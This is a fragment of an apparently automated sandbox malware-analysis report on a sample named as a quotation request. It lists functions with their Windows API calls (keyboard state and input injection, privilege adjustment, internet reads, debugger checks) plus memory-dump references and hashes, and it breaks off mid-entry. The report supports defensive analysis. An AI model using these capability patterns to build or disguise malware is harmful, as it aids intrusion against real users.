                                                                                                                    • Instruction Fuzzy Hash: 54A28D71E0061ACBDF24CF58C9507EDB7B1BB54761F2481AAED15A7280EB309DC6EB90
                                                                                                                    Function 00F9A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F9A6AC
                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F9A6BA
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F9A79C
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F9A7AB
                                                                                                                      • Part of subcall function 00F2CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F53303,?), ref: 00F2CE8A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1991900642-0
                                                                                                                    • Opcode ID: 78c57a434ddee52dea2a5b2bcd285ba49acf836ae4b32f4ad29741694aee0a58
                                                                                                                    • Instruction ID: 722fe351c1748de979a47c3afb8cd7816dc5f330440b0fc0cd279f0cfb3c24a8
                                                                                                                    • Opcode Fuzzy Hash: 78c57a434ddee52dea2a5b2bcd285ba49acf836ae4b32f4ad29741694aee0a58
                                                                                                                    • Instruction Fuzzy Hash: A7518DB1508300AFD710EF24CC86AABBBE8FF89754F40891DF58597252EB34D944DBA2
                                                                                                                    Function 00F7AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00F7AAAC
                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 00F7AAC8
                                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00F7AB36
                                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00F7AB88
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: a4ba9a4e0099330e77d1f2ffbf6174b4b83044a8b2c257ea38b7d3e260fb5171
                                                                                                                    • Instruction ID: 11232d4ede8501653a32417b206a4487285679964dc8a73efaccf78b0c70eb7b
                                                                                                                    • Opcode Fuzzy Hash: a4ba9a4e0099330e77d1f2ffbf6174b4b83044a8b2c257ea38b7d3e260fb5171
                                                                                                                    • Instruction Fuzzy Hash: 3E312971E40608AEFB35CA68CC05BFE77A6ABC5320F04C21BF189521D1D3788991E7A3
                                                                                                                    Function 00F8CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00F8CE89
                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00F8CEEA
                                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00F8CEFE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 234945975-0
                                                                                                                    • Opcode ID: 34cb6fbb9d5c3122747d19eab950588b1254c5e8dfc05af7333dd89e59ad23e8
                                                                                                                    • Instruction ID: ec625a9fc308bcc9873edcb56951f05c6b093f81e237c4462ef86650d3475be9
                                                                                                                    • Opcode Fuzzy Hash: 34cb6fbb9d5c3122747d19eab950588b1254c5e8dfc05af7333dd89e59ad23e8
                                                                                                                    • Instruction Fuzzy Hash: 7E219DB1900305ABEB30EF65D948BA6B7F8EB40364F10441EE646D2151EB74EE04ABB0
                                                                                                                    Function 00F7DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(?,00F55222), ref: 00F7DBCE
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00F7DBDD
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F7DBEE
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00F7DBFA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2695905019-0
                                                                                                                    • Opcode ID: 46dae4dfb3a0abb58f37b6decb6ed4772749cd2c7888922c763248c6cba439ed
                                                                                                                    • Instruction ID: 9b6e914df988fdef2eba061db013cfec5015df111293edcfa3db9e1ad4e6b231
                                                                                                                    • Opcode Fuzzy Hash: 46dae4dfb3a0abb58f37b6decb6ed4772749cd2c7888922c763248c6cba439ed
                                                                                                                    • Instruction Fuzzy Hash: 8FF0E5718109185782216B7CEC0D9AA37BC9E02334B908703F83AC20F0EBB05D54E6D6
                                                                                                                    Function 00F78298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F782AA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen
                                                                                                                    • String ID: ($|
                                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                                    • Opcode ID: 4f2f069cecda3551122e75d49bf27699e4f51095717b17680255546d033ac9cd
                                                                                                                    • Instruction ID: 0f2e6cec57b3a6c11fec37e77f40bf99c454f9d5491702dd92d365b1dcfb91ea
                                                                                                                    • Opcode Fuzzy Hash: 4f2f069cecda3551122e75d49bf27699e4f51095717b17680255546d033ac9cd
                                                                                                                    • Instruction Fuzzy Hash: 16324575A007059FCB28CF59C484A6AB7F0FF48760B15C46EE49ADB3A1EB70E942DB41
                                                                                                                    Function 00F85C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F85CC1
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F85D17
                                                                                                                    • FindClose.KERNEL32(?), ref: 00F85D5F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3541575487-0
                                                                                                                    • Opcode ID: 1e64dc3812555221e877e2e4f3abd9e31401fed9375ec73978ab3f85ceac69a7
                                                                                                                    • Instruction ID: c008c6c18b6bfc75abc246cf119fdf934f6775e9ac485371e57f03774d68a954
                                                                                                                    • Opcode Fuzzy Hash: 1e64dc3812555221e877e2e4f3abd9e31401fed9375ec73978ab3f85ceac69a7
                                                                                                                    • Instruction Fuzzy Hash: 1351AA75A046019FC714DF28C884A96B7E4FF4A324F14855EE95A8B3A2CB30EC45DF91
                                                                                                                    Function 00F42622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00F4271A
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F42724
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00F42731
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3906539128-0
                                                                                                                    • Opcode ID: af65c46d824775380e3fb31d6d5cbc6bbbd8c8621132d384c1aa8aac756cce97
                                                                                                                    • Instruction ID: 6ad348dcd64dcf382dd26fd4c73c9b5bdb9b45fce6d86b9ba5e31db741ba71d9
                                                                                                                    • Opcode Fuzzy Hash: af65c46d824775380e3fb31d6d5cbc6bbbd8c8621132d384c1aa8aac756cce97
                                                                                                                    • Instruction Fuzzy Hash: 1531D57490121C9BCB61DF64DD887DCBBB8AF08320F5041EAE80CA7260EB349F819F44
                                                                                                                    Function 00F851CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F851DA
                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F85238
                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00F852A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1682464887-0
                                                                                                                    • Opcode ID: f04022dc3da9008dbf3484178a6f39eb5d4f73feae19bcedf1f3b42fcc5fccc1
                                                                                                                    • Instruction ID: 16000cb66742f021ca14673fb0a774231b29993c8eb9ca7b6d92d2aa4d8b3527
                                                                                                                    • Opcode Fuzzy Hash: f04022dc3da9008dbf3484178a6f39eb5d4f73feae19bcedf1f3b42fcc5fccc1
                                                                                                                    • Instruction Fuzzy Hash: 8E314B75A005189FDB00EF54D884EEDBBB5FF49318F088099E805AB362DB35E856DBA0
                                                                                                                    Function 00F716C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F2FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F30668
                                                                                                                      • Part of subcall function 00F2FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F30685
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7170D
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F7173A
                                                                                                                    • GetLastError.KERNEL32 ref: 00F7174A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 577356006-0
                                                                                                                    • Opcode ID: 6e09c38dd636a62d97ecdc8812c0ba542d247c6507eafdf9073167ae310d32cc
                                                                                                                    • Instruction ID: 95674c26b90714930534801cd318e986c9149bcd2e2940acb35e0d5249b38377
                                                                                                                    • Opcode Fuzzy Hash: 6e09c38dd636a62d97ecdc8812c0ba542d247c6507eafdf9073167ae310d32cc
                                                                                                                    • Instruction Fuzzy Hash: 531191B2414308AFD7189F54EC86D6AB7BDFB44714B20C52EE05A97241EB70BC469A60
                                                                                                                    Function 00F7D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F7D608
                                                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00F7D645
                                                                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F7D650
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 33631002-0
                                                                                                                    • Opcode ID: 7c2058e7edc026ba59621f85e861d25711857ec67f4018a9a58715f81c6f7fef
                                                                                                                    • Instruction ID: 4bdc1c896cc5334b0c5f12ccd9ea2b318b25c957004efa49418a77eb4bad9b68
                                                                                                                    • Opcode Fuzzy Hash: 7c2058e7edc026ba59621f85e861d25711857ec67f4018a9a58715f81c6f7fef
                                                                                                                    • Instruction Fuzzy Hash: 79115EB5E05228BFDB108F95DC45FAFBBBCEB45B60F108116F908E7290D6704A059BE1
                                                                                                                    Function 00F71663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F7168C
                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F716A1
                                                                                                                    • FreeSid.ADVAPI32(?), ref: 00F716B1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429775523-0
                                                                                                                    • Opcode ID: aed67277c8e5867b9a7a71446f905976ef6f1e4fc672295cb35595cd8700cd6d
                                                                                                                    • Instruction ID: 37dd705213021eaebbf7e2cde4170a855202455b5d427b253a66063728539fb2
                                                                                                                    • Opcode Fuzzy Hash: aed67277c8e5867b9a7a71446f905976ef6f1e4fc672295cb35595cd8700cd6d
                                                                                                                    • Instruction Fuzzy Hash: E2F0F4B195030DFBDB00DFE49C89AAEBBBCFB08604F508565E501E2181E774AA449A90
                                                                                                                    Function 00F34CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00F428E9,?,00F34CBE,00F428E9,00FD88B8,0000000C,00F34E15,00F428E9,00000002,00000000,?,00F428E9), ref: 00F34D09
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00F34CBE,00F428E9,00FD88B8,0000000C,00F34E15,00F428E9,00000002,00000000,?,00F428E9), ref: 00F34D10
                                                                                                                    • ExitProcess.KERNEL32 ref: 00F34D22
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 203cb351ed87e93d7c41eb9ecdc3dfd45b4b81d78f909905368957679470f44b
                                                                                                                    • Instruction ID: 78038989cfd1955f3de3d1ac556c349cfdce4f56abf39240fac271fc1cdcb42f
                                                                                                                    • Opcode Fuzzy Hash: 203cb351ed87e93d7c41eb9ecdc3dfd45b4b81d78f909905368957679470f44b
                                                                                                                    • Instruction Fuzzy Hash: 95E0B671400249ABCF11AF54DD09A593F69EB427A1F104014FC059A132CB39FD42EA80
                                                                                                                    Function 00F4C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: /
                                                                                                                    • API String ID: 0-2043925204
                                                                                                                    • Opcode ID: 95cb962c3bfe9e281a57355c72ee840e54363cd73944f57dac92f970a79b4cea
                                                                                                                    • Instruction ID: 2fb6709a79a0538c735a565c92b3611c16e92c6b407def5b004abf94e1012e44
                                                                                                                    • Opcode Fuzzy Hash: 95cb962c3bfe9e281a57355c72ee840e54363cd73944f57dac92f970a79b4cea
                                                                                                                    • Instruction Fuzzy Hash: A54129769012196FCB20DFB9CC49EBB7B78EB84324F504269FD05D7180E6709E41DB90
                                                                                                                    Function 00F6D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00F6D28C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameUser
                                                                                                                    • String ID: X64
                                                                                                                    • API String ID: 2645101109-893830106
                                                                                                                    • Opcode ID: a5f5322b997eb5134c05c2381494a70ced107d3fa81a36c63267e1526c8ced7b
                                                                                                                    • Instruction ID: 38f290aaa8e6e19dbd66da034082098263cd9d44a4ad43d5f2c14a0e1be4a1ac
                                                                                                                    • Opcode Fuzzy Hash: a5f5322b997eb5134c05c2381494a70ced107d3fa81a36c63267e1526c8ced7b
                                                                                                                    • Instruction Fuzzy Hash: 6CD0CAB680116DEACB94CBA0EC88EDAB3BCBB04305F104292F106E2000DB349648AF20
                                                                                                                    Function 00F3CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
